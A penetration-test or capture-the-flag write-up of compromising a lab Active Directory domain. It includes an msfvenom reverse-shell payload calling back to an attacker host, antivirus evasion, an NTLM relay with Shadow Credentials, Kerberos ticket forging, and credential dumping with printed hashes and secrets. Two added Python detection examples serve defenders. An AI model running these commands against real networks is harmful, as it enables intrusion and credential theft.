Discovering a share folder with excessive permission
During enumeration the tester found that guest authentication was enabled on the server, which allowed the SMB shares to be enumerated. Additionally, the Public share was found to allow Read and Write permissions.
While attempting to obtain a reverse shell, the tester found that the AV enabled on the system prevented the execution of malicious software. The tester proceeded to bypass the detection using DSViper.
Creating shellcode using msfvenom
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Using DSViper to create final payload
❯ ./DSViper
░▒▓███████▓▒░ ░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
................................................
AntiVirus Bypass Tool (v.0.2.1)
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vankineni
---------------------------------------------------------
................................................
You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>1
Please type in the shellcode file name: payload.bin
Selected self-injection(XOR)
[*]Payload successfully created as DSViper_xor.exe
Creating malicious LNK files
The tester proceeded to create two malicious LNK files:
During post-enumeration the tester discovered WebDAV, which was subsequently enabled.
Starting the WebClient service using the net use command:
C:\Windows\System32> WS01
[x] Unable to reach DAV pipe on WS01, system is either unreachable or does not have WebClient service running
#Start the WebClient service (WebDAV)
C:\Windows\System32> net use x: http://10.8.5.48/
C:\Windows\System32> GetWebDAVStatus.exe WS01
[+] WebClient service is active on WS01
Starting the WebClient service using c2tc-startwebclient:
sliver (COMBINED_AGLET) > c2tc-startwebclient
[*] Successfully executed c2tc-startwebclient (coff-loader)
[*] Got output:
[+] WebClient service started successfully.
NTLM relay attack via WebDAV + Shadow Credentials
To successfully carry out this attack, the environment must have the following misconfigurations:
LDAP Signing is NOT enforced
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota > 0; if not, proceed with Shadow Credentials instead.
Valid NetBIOS name resolution via Responder
Intranet zone conditions have to be met, which means adding our computer to the domain using the NetBIOS name provided by Responder.
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] Searching for the target account
[*] Target user found: CN=WS01,CN=Computers,DC=Sidecar,DC=vl
[*] Generating certificate
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Certificate generated
[*] Generating KeyCredential
[*] Updating the msDS-KeyCredentialLink attribute of ws01$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: jwtHNq1B.pfx
[*] Must be used with password: ogkkN1eOSsZYekxP3yoK
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK Sidecar.vl/ws01$ jwtHNq1B.ccache
Requesting a Kerberos TGT Using Certificate-Based Authentication (PKINIT)
❯ python3 ~/Documents/Tools/PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK 'Sidecar.vl/ws01$' jwtHNq1B.ccache
2025-05-02 16:52:42,718 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-02 16:52:42,730 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-02 16:52:58,213 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-02 16:52:58,213 minikerberos INFO 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
INFO:minikerberos:6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
2025-05-02 16:52:58,215 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
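The three steps shown above (WebClient started on WS01, the relayed WS01$ session writing its own msDS-KeyCredentialLink, then a certificate-based TGT request for ws01$) each leave a trace on the defender's side. The following detection logic is an added example, not part of the original write-up or of ntlmrelayx/PKINITtools. It runs over constructed, simplified event records whose field names are assumptions modelled on Windows events 7036 (service state change), 5136 (directory object modified, which requires object-change auditing on the DC) and 4768 (TGT request, where pre-authentication type 16 means PA-PK-AS-REQ, i.e. PKINIT). The prerequisites listed earlier double as the fix: enforcing LDAP signing and channel binding blocks the relay to LDAPS in the first place.

```python
from dataclasses import dataclass
from typing import Dict, List

KEYCRED_ATTR = "msDS-KeyCredentialLink"


@dataclass
class Event:
    """A simplified Windows event record (assumed field names, not the real XML)."""
    event_id: int
    host: str
    fields: Dict[str, str]


# Constructed sample records that mirror the chain in the write-up, plus benign noise.
SAMPLE_EVENTS: List[Event] = [
    Event(7036, "WS01", {"ServiceName": "WebClient", "State": "running"}),
    Event(5136, "DC01", {"SubjectUserName": "WS01$",
                         "ObjectDN": "CN=WS01,CN=Computers,DC=Sidecar,DC=vl",
                         "AttributeLDAPDisplayName": KEYCRED_ATTR,
                         "OperationType": "Value Added"}),
    Event(4768, "DC01", {"TargetUserName": "ws01$", "PreAuthType": "16"}),
    # Benign: an admin editing a user description, and a normal password-based TGT.
    Event(5136, "DC01", {"SubjectUserName": "Administrator",
                         "ObjectDN": "CN=Alice,CN=Users,DC=Sidecar,DC=vl",
                         "AttributeLDAPDisplayName": "description",
                         "OperationType": "Value Added"}),
    Event(4768, "DC01", {"TargetUserName": "e.klaymore", "PreAuthType": "2"}),
]


def first_rdn(dn: str) -> str:
    """Return the value of the leading RDN of a DN, e.g. 'WS01' from 'CN=WS01,...'."""
    head = dn.split(",", 1)[0]
    return head.split("=", 1)[1].strip() if "=" in head else head


def is_machine_account(sam: str) -> bool:
    return sam.endswith("$")


def keycred_self_writes(events: List[Event]) -> List[Event]:
    """5136 events where a machine account adds a value to its OWN msDS-KeyCredentialLink.

    That is what the relayed WS01$ session did above; legitimate writes to this
    attribute normally come from enrollment services or administrators.
    """
    hits = []
    for e in events:
        if e.event_id != 5136 or e.fields.get("AttributeLDAPDisplayName") != KEYCRED_ATTR:
            continue
        subject = e.fields.get("SubjectUserName", "")
        target = first_rdn(e.fields.get("ObjectDN", ""))
        if is_machine_account(subject) and subject[:-1].lower() == target.lower():
            hits.append(e)
    return hits


def pkinit_tgt_requests(events: List[Event]) -> List[Event]:
    """4768 events whose pre-authentication type is 16 (PA-PK-AS-REQ, i.e. PKINIT)."""
    return [e for e in events if e.event_id == 4768 and e.fields.get("PreAuthType") == "16"]


def webclient_starts(events: List[Event]) -> List[Event]:
    """7036 events recording the WebClient (WebDAV) service entering the running state."""
    return [e for e in events
            if e.event_id == 7036
            and e.fields.get("ServiceName") == "WebClient"
            and e.fields.get("State") == "running"]


def correlate(events: List[Event]) -> List[dict]:
    """Tie the three signals together per machine account and assign a severity."""
    pkinit_accounts = {e.fields["TargetUserName"].lower() for e in pkinit_tgt_requests(events)}
    webclient_hosts = {e.host.lower() for e in webclient_starts(events)}
    findings = []
    for e in keycred_self_writes(events):
        account = e.fields["SubjectUserName"]
        host = account[:-1].lower()          # WS01$ -> ws01
        finding = {
            "account": account,
            "self_keycred_write": True,
            "pkinit_tgt_followed": account.lower() in pkinit_accounts,
            "webclient_started_on_host": host in webclient_hosts,
        }
        score = 1 + finding["pkinit_tgt_followed"] + finding["webclient_started_on_host"]
        finding["severity"] = {1: "medium", 2: "high", 3: "critical"}[score]
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```

A self-write to msDS-KeyCredentialLink by a machine account is worth an alert on its own; the WebClient start on the same host and a PKINIT TGT for that account shortly afterwards raise it to the full chain seen in this engagement.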
Retrieving the NT hash of the WS01$ computer account
❯ KRB5CCNAME='jwtHNq1B.ccache' python3 ~/Documents/Tools/PKINITtools/getnthash.py -k 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9 'Sidecar.vl/ws01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
31fc45654028564d0ceda3817829d52f
Crafting Silver ticket for Local Administrator via S4U
# From Windows using Rubeus.exe
Rubeus.exe asktgt /nowrap /user:"ws01$" /rc4:31fc45654028564d0ceda3817829d52f
Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:"host/ws01.sidecar.vl" /ticket:<ticket>
# From Linux
# Using PKINITtools
❯ python3 gets4uticket.py kerberos+ccache://sidecar.vl\\WS01\$:jwtHNq1B.ccache@DC01.sidecar.vl host/WS01.sidecar.vl@sidecar.vl Administrator@sidecar.vl Administrator.ccache -v
INFO:minikerberos:Trying to get SPN with Administrator@sidecar.vl for host/WS01.sidecar.vl@sidecar.vl
2024-02-16 01:41:58,209 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-02-16 01:41:58,209 minikerberos INFO Done!
INFO:minikerberos:Done!
# Using the Impacket toolkit
❯ impacket-ticketer -domain-sid S-1-5-21-3976908837-939936849-1028625813 -nthash 31fc45654028564d0ceda3817829d52f -domain sidecar.vl -spn host/ws01.sidecar.vl -user-id 500 administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sidecar.vl/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
Dumping local SAM hashes and LSA secrets on WS01
❯ KRB5CCNAME='administrator.ccache' impacket-secretsdump -k -no-pass WS01.sidecar.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a7eb14088fd30c1af40ff91acd7734ce:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1000:aad3b435b51404eeaad3b435b51404ee:09e8df317667fc45698f7db80c58fd3f:::
Deployer:1001:aad3b435b51404eeaad3b435b51404ee:c5ad69fd899918450831c9d2b23f27a1:::
[*] Dumping cached domain logon information (domain/username:hash)
SIDECAR.VL/E.Klaymore:$DCC2$10240#E.Klaymore#66e0fb1767fe4f00983784904ad42579: (2025-05-02 21:01:00)
SIDECAR.VL/Administrator:$DCC2$10240#Administrator#0105946ef533599c2b1b769f3d9016dd: (2023-12-02 11:27:44)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SIDECAR\WS01$:plain_password_hex:1880a0f624b99fb13150deef1afba09a3590e0e778518cb3cb48cdb23b1ab50c87bba5ce15d4b7c3d0decaad51e242b0d852f85f7672ae293c87d5412a1ea19751c0ad8b496ea343aeaf428b1b04a22e5066b7d2665da598e5dfafa827df1e5e916c1a65ea28acc6a9d9caf8bdf021760d6581f550cfe932dfe842eee145bd0ebcb64f0841825d0ed65c2a9c2a7c131b2a3e614070d89d480e7996a8cbfb28996f6c3df4155641ffda9caf6d014499cec3d7520de7418f977465a42be2cc1e73447d213ae782f119ff8b9d01c8517f1447ca6b5fa42349086ecdb67c949b7fa36fa05a3d6c38fa5440bf08c82db6db10
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:31fc45654028564d0ceda3817829d52f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5f9303f91320d51860ac3a1313e79027a226ec34
dpapi_userkey:0x21fd9a9c71f6b32d717142ca71212c70c33bf4d3
[*] NL$KM
0000 48 35 C4 FE DA 3E 65 75 57 78 B9 E8 26 12 99 AD H5...>euWx..&...
0010 C3 C9 10 90 E7 7E 77 ED 91 66 BB 10 28 15 FF 24 .....~w..f..(..$
0020 6E 20 0C A9 6A A1 82 8D EA 3E FC B5 DB 18 F9 0B n ..j....>......
0030 3C 62 FD 18 AE 7C B4 C5 AA 06 E6 4E D9 1F 27 85 <b...|.....N..'.
NL$KM:4835c4feda3e65755778b9e8261299adc3c91090e77e77ed9166bb102815ff246e200ca96aa1828dea3efcb5db18f90b3c62fd18ae7cb4c5aa06e64ed91f2785
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Obtaining a shell as Administrator
❯ KRB5CCNAME='administrator.ccache' impacket-wmiexec -k -no-pass WS01.sidecar.vl -shell-type powershell
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> C:\Temp\Loader.exe
Compromising domain controller
Initial Foothold on DC01
Discovering a valid domain user
During enumeration, the tester found the domain user svc_deploy, which appears similar to the local user Deployer found on WS01. This could indicate that they are the same user and may share the same credentials.
The user possesses SeTcbPrivilege ("Act as part of the operating system"), which means it can impersonate a token for any other user without knowing the credentials, add an arbitrary group (such as Administrators) to the token, set the integrity level of the token to "medium", and assign this token to the current thread (SetThreadToken).
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
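The whoami /priv listing above is the kind of output a privilege audit should parse rather than eyeball: a service account holding SeTcbPrivilege is a finding regardless of what the rest of the table says. The parser below is an added example, not part of the original write-up; it embeds a constructed copy of that table with the real fixed-width column layout (the row of "=" runs defines the columns) and flags the privileges that are generally recognised as equivalent to full control of the host. The HIGH_RISK_PRIVILEGES list and the wording of its explanations are the example's own choices.

```python
import re
from typing import Dict, List

# Privileges whose holder can reach SYSTEM-equivalent control of the host.
# SeTcbPrivilege is the one found on svc_deploy in the write-up.
HIGH_RISK_PRIVILEGES: Dict[str, str] = {
    "SeTcbPrivilege": "act as part of the OS: create logon tokens for any user",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeBackupPrivilege": "read any file, including registry hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# Constructed sample: the svc_deploy table from the write-up with whoami's column spacing.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeTcbPrivilege                Act as part of the operating system Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
"""


def parse_whoami_priv(text: str) -> List[Dict[str, str]]:
    """Parse the fixed-width table printed by `whoami /priv`.

    The line made of '=' runs gives the column boundaries, so descriptions that
    contain spaces (and a State column separated by a single space) parse cleanly.
    """
    lines = text.splitlines()
    sep_idx = next((i for i, l in enumerate(lines)
                    if l.strip() and set(l.strip()) <= {"=", " "}), None)
    if sep_idx is None or sep_idx == 0:
        raise ValueError("no column separator line found")
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[sep_idx])]
    header = lines[sep_idx - 1]
    names = [header[s:e].strip() for s, e in spans]
    rows: List[Dict[str, str]] = []
    for line in lines[sep_idx + 1:]:
        if not line.strip():
            continue
        row = {}
        for idx, (s, e) in enumerate(spans):
            end = e if idx < len(spans) - 1 else len(line)   # last column runs to EOL
            row[names[idx]] = line[s:end].strip()
        rows.append(row)
    return rows


def flag_high_risk(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the high-risk privileges present in the table.

    State is reported but not used as a filter: a privilege listed as Disabled is
    still held by the token and can be enabled by the process at any time.
    """
    return [
        {"privilege": r["Privilege Name"], "state": r["State"],
         "why": HIGH_RISK_PRIVILEGES[r["Privilege Name"]]}
        for r in rows if r["Privilege Name"] in HIGH_RISK_PRIVILEGES
    ]


if __name__ == "__main__":
    for hit in flag_high_risk(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{hit['privilege']} ({hit['state']}): {hit['why']}")
```

Feed it the saved output of whoami /priv from each service account to get a list of accounts that need their privileges trimmed; in this case the finding is the SeTcbPrivilege grant on svc_deploy.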
Abusing SeTcbPrivilege via TcbElevation
# Compile: open the Developer Command Prompt for VS
cl TcbElevation.cpp /D_UNICODE /DUNICODE /EHsc /link Secur32.lib Advapi32.lib